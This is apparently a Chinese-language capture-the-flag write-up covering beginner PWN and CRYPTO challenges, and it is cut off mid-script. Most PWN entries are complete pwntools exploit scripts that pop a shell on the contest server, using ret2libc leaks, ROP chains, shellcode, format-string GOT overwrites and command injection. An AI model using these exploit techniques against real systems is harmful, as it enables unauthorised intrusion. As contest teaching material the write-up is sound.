
入门推荐

b站搜星盟安全团队国资社畜

[WEEK1]nc

nc直接连

file

[WEEK1]四则计算器

基础的ret2text,利用scanf函数的漏洞,遇到\x00就会停止读取来溢出,跳转到后门函数

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/alloc')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32572)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/alloc')

chooselibc = 1
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)')  #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

backdoor = 0x4015E4
payload = b'\x00'+ b'a' * (0x31 + 0x08) + p64(backdoor)
io.sendlineafter('>',payload)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

file

[WEEK1]猜数游戏

先对源码简单分析一下,主要考点是伪随机数

file

我们需要先发送一个数字作为第二个输入字符串的长度,直接发送最大长度11,然后利用python调用C语言来计算随机数,多次尝试获取shell

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/guess')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32573)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/guess')

chooselibc = 1
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)')  #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

my_libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
my_libc.srand(my_libc.time(0))
v4 = str(my_libc.rand())
io.sendlineafter('number?',str(11))
io.sendline(v4)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

file

[WEEK1]hard nc

同样是nc直接连,但是出题人利用linux命令的特性,将部分flag放在了特殊文件中

利用ls -a查看所有文件,查看.gift,可以得到前半段

file

在更换到gift2目录中,查看flag2,可以得到一串base64

file

厨子解密,拼接即可获得完整flag

file

[WEEK1]ropchain

使用ROPgatget命令自动生成一个ROP链

Ropgadget --binary 附件名 --ropchain

补充偏移,直接利用

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32540)

elfnum = 0
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('')

chooselibc = 1
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)')  #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

p = b'a' * 0x28

p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401243) # syscall
io.send(p)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

file

[WEEK1]口算题

pwntools的基本使用方法,利用爆破获取flag

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32543)

elfnum = 0
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('')

chooselibc = 1
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)')  #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

io.send(b'\n')
io.recv()
io.recv()
a = int(io.recvuntil(' ',drop=True))
b = str(io.recvuntil(' ',drop=True),encoding='utf-8')
c = int(io.recvuntil(' ',drop=True))

if b == '+':
    io.sendline(str(a + c))
elif b == '-':
    io.sendline(str(a - c))
elif b == '×':
    io.sendline(str(a * c))
elif b == '**':
    io.sendline(str(a ** c))
elif b == '%':
    io.sendline(str(a % c))
else:
    io.sendline(str(a / c))

while(1):
    io.recvline()
    io.recvline()
    io.recvline()
    a = int(io.recvuntil(' ',drop=True))
    b = str(io.recvuntil(' ',drop=True),encoding='utf-8')
    c = int(io.recvuntil(' ',drop=True))

    if b == '+':
        io.sendline(str(a + c))
    elif b == '-':
        io.sendline(str(a - c))
    elif b == '×':
        io.sendline(str(a * c))
    elif b == '**':
        io.sendline(str(a ** c))
    elif b == '%':
        io.sendline(str(a % c))
    else:
        io.sendline(str(a / c))

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

file

[WEEK1]babystack

其他师傅用的好像是ret2syscall,我用的ret2libc,没有什么特别的,基础的ret2libc,但是这里利用的是write函数来读写

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/babystack')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32570)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/babystack')

chooselibc = 1
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)')  #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

ret = 0x400581
rdi = 0x400833
rsi = 0x400831
w_plt = elf.plt['write']
w_got = elf.got['write']
sys = 0x4007AE
main = elf.sym['vuln']
payload = b'a' * 0x28 + p64(ret) + p64(rdi) + p64(1) + p64(rsi) + p64(w_got) + p64(0)  + p64(w_plt) + p64(main)
io.sendlineafter('it',payload)
ret_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))

base = ret_addr - libc.sym['write']
binsh = base + next(libc.search(b'/bin/sh\x00'))
payload1 = b'a' * 0x28 + p64(rdi) + p64(binsh) + p64(sys)
io.send(payload1)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

file

[WEEK1]showshowway

file

分析我们可知,当y和p值相等时,我们就可以获取shell,我们输入的值会存放带bss段中,y是溢出之后填充的值,p的值为showshowway

file

这样思路就很清晰,我们需要利用垃圾数据将S填充满,然后就会读取剩余部分。S的溢出值为0xFF-0xC0

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/showshowway')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32565)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/showshowway')

chooselibc = 1
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)')  #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

payload = b'a' * 64 + b'showshowway'
io.sendlineafter('try',payload)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

file

[WEEK1]pkmon

分析一下源码

file

这里将我们输入的值,存放到0x6010A0的地址中,我们可以通过v1的地址来改变我们的函数利用地址,找到puts函数的got表地址,计算出v1的值,从而调用puts函数来执行跳转到后门函数

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/pkmon')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32578)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/pkmon')

chooselibc = 1
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x1466)')  #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

backdoor = 0x40072B
io.send(b'-17')       #(0x18-0XA0)/8
io.send(p64(backdoor))

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

file

[WEEK2]easy_shellcode

基础的shellcode

payload = b'a' * 0x10
io.sendafter('name?',payload)
addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(addr))

shell_addr = addr - 0x80
shellcode = asm(shellcraft.sh()).ljust(0x78,b'a') + p64(shell_addr)
io.sendlineafter('strong',shellcode)

[WEEK2]baby_rop

虽然是静态,但是字符长度太短,只能自己去构造可利用的ROP链

read = 0x805CAF0
edx_ecx_ebx = 0x08049941
eax = 0x080aa06a
int_80 = 0x08049b62

payload = b'a'*(0x1c+4) + p32(read) + p32(edx_ecx_ebx) + p32(0) + p32(0x80e3000) + p32(0x8) + p32(edx_ecx_ebx)+ p32(0) + p32(0) + p32(0x80e3000) + p32(eax) + p32(11) + p32(int_80)

io.send(payload)

sleep(0.1)
io.sendline(b'/bin/sh\x00')

[WEEK2]baby_rop2

使用ROPgadget命令生成ROP链,题目对长度做了限制,浅浅修改一下

p = b'a' * 0x28

p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += p64(0x419a1c)
p += p64(0x3b)
p += pack('<Q', 0x0000000000401243)

io.send(p)

[WEEK2]string

格式化字符串的利用

ret = 0x40101a
rdi = 0x401343
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main = elf.sym['main']

io.sendlineafter('choice:',b'1')
payload = b'%43$p'
io.sendlineafter('message:',payload)
io.recv()
p_addr = int(io.recvuntil('\n',drop=True),16)
print(hex(p_addr))

base = p_addr - 0x24083
print(hex(base))
system = base + libc.sym['system']

payload1 = fmtstr_payload(6,{printf_got: system})
io.sendlineafter('choice:',b'1')
io.sendlineafter('message:',payload1)
io.sendlineafter('choice:',b'1')
io.sendline("/bin/sh\x00")

[WEEK2]原始人,起动

先通过发送yuanshen,qidong!的16进制来绕过第一次判断,随后通过循环发送sh来获取执行shell命令的权限

sleep(0.1)
io.sendline(str(0x6e617579))
sleep(0.1)
io.sendline(str(0x6e656873))
sleep(0.1)
io.sendline(str(0x6469712c))
sleep(0.1)
io.sendline(str(0x21676e6f))

for i in range(0xc):
    sleep(0.1)
    io.sendline(str(0x68733b)) # ;sh

[WEEK2]要买些东西吗

需要修改libc,利用格式化字符串泄露地址

libc = ELF('/home/yu/CTF/PWN/glibc-all-in-one/libs/2.31-0ubuntu9.7_i386/libc-2.31.so')

ret = 0x0804900e
puts_got = elf.got['puts']
main = elf.sym['main']

io.sendlineafter("choice:",b'1')
fmt = b"%15$p.%19$p"
io.sendlineafter("gift",fmt)
io.recv()
canary = int(io.recvuntil(b'.')[:-1], 16)
p_addr = int(io.recvuntil('\n',drop=True),16)

base = p_addr - 0x1aee5
print(hex(base))
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))

payload1 = b'a'*0x20 + p32(canary) + p32(0)*3 + p32(system) + p32(0) + p32(binsh)
io.sendlineafter("choice:",b'2')
io.sendlineafter('power',payload1)

CRYPTO

学习推荐

古典自己摸索,现代密码b站搜风二西的个人空间-风二西个人主页-哔哩哔哩视频 (bilibili.com)

[WEEK1]立正

先通过凯撒解密,翻转得到一个hint

file

file

随后发现密文有似曾相识的地方,像是base64加密,利用flag包裹的经验,将flag{加密

file

我们可以发现,大括号之然后的任意输入,密文不变的值始终是ZmxhZ3t,随后与题目密文对比,发现大写的字母和数字都发生了偏移,小写字母则不变

file

由此可知是一个变异的凯撒加密,编写脚本得到base64的真正密文,解密得到flag

def decrypt_string(s):
    result = ""
    for c in s:
        if c.isupper():
            # 大写字母,加上 21
            ascii_val = ord(c) + 21
            if ascii_val > ord('Z'):
                ascii_val -= 26
            result += chr(ascii_val)
        elif c.isdigit():
            # 数字,减去 5
            num_val = int(c) - 5
            if num_val < 0:
                num_val += 10
            result += str(num_val)
        else:
            # 小写字母,保持不变
            result += c
    return result

encrypted_string = "EmxhE8tERKAfYAZ6S636dIWuEK46ZK4yRBdNdK4uRKd4"
decrypted_string = decrypt_string(encrypted_string)
print("Decrypted String:", decrypted_string)
# ZmxhZ3tZMFVfTVU1N181dDRuZF91UF9yMWdIdF9uMFd9

file

[WEEK1]Crypto_Checkin

Toolsfx一把梭

file

[WEEK1]残缺的md5

看到md5,直接爆破

import hashlib

strings = ["f0af", "b1f463", "f7ae", "b2ac4e6"]

def crack_md5(md5_str):
    for s in strings:
        if s not in md5_str:
            return False
    return True

def brute_force_question_mark():
  for c1 in range(32,128):
    for c2 in range(32,128):
        for c3 in range(32,128):
           password = "KCLWG" + chr(c1) + "K8M9O3" + chr(c2) + "DE" + chr(c3) + "84S9"
           md5_hash = hashlib.md5(password.encode()).hexdigest()
           if crack_md5(md5_hash):
              print("Found password: ", password)
              return
  print("Password not found!")

brute_force_question_mark()

#KCLWGXK8M9O3KDED84S9

将最后的值md5加密就是flag

[WEEK1]凯撒大帝

凯撒解密

凯撒(Caesar)加密/解密 - Bugku CTF

file

[WEEK1]进制

厨子一把梭

file

[WEEK1]okk

ook解密

Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

file

[WEEK1]熊斐特

通过百度可知是埃特巴什码,找在线工具一把梭

CTF在线工具-在线埃特巴什码加密|在线埃特巴什码解密|埃特巴什码算法|Atbash Cipher (hiencode.com)

file

[WEEK1]佛说:只能四天

先用toolsfx对密文进行解密,得到一串社会主义编码的密文

file

对密文进行解密得到一段16进制的密文,但16进制解密解不出来,猜测还有其他加密方式,第一组是f的16进制,第二则不是l,猜测是栅栏加凯撒,最后再解16进制得到flag

file

file

file

file

[WEEK1]黑暗之歌

先对盲文解密,可以得到一串base64密文

盲文点字加密/解密 - 一个工具箱 - 好用的在线工具都在这里! (atoolbox.net)

file

再使用toolsfx解密得到一串音符密文

file

最后再使用对音符密文解密得到flag

文本加密为音乐符号,可自设密码|文本在线加密解密工具 (qqxiuzi.cn)

file

[WEEK1]迷雾重重

随波逐流一把梭(需要注意的是,随波逐流解出来的一般都是大写,flag需要自己尝试是大写或者小写)

file

[WEEK1]难言的遗憾

百度可知是中文电话编码,找到在线网站,解密即可

中文电码查询 - 中文电码转换 - 中文电码对照表 (bmcx.com)

file

[WEEK1]小兔子可爱捏

根据题目名可知是rabbit加密,附件描述密钥为宇宙的终极答案是什么?百度可知为42(U2F开头的密文就是rabbit加密的特征)

在线Rabbit加密 | Rabbit解密- 在线工具 (sojson.com)

file

[WEEK1]电信诈骗

根据题目描述,得知用到了rot47加密和一个异或50,再根据将vivo50作为启动资金,所以需要先异或再进行rot47

def rot47(s):
    result = ""
    for c in s:
        if ord(c) >= 33 and ord(c) <= 126:
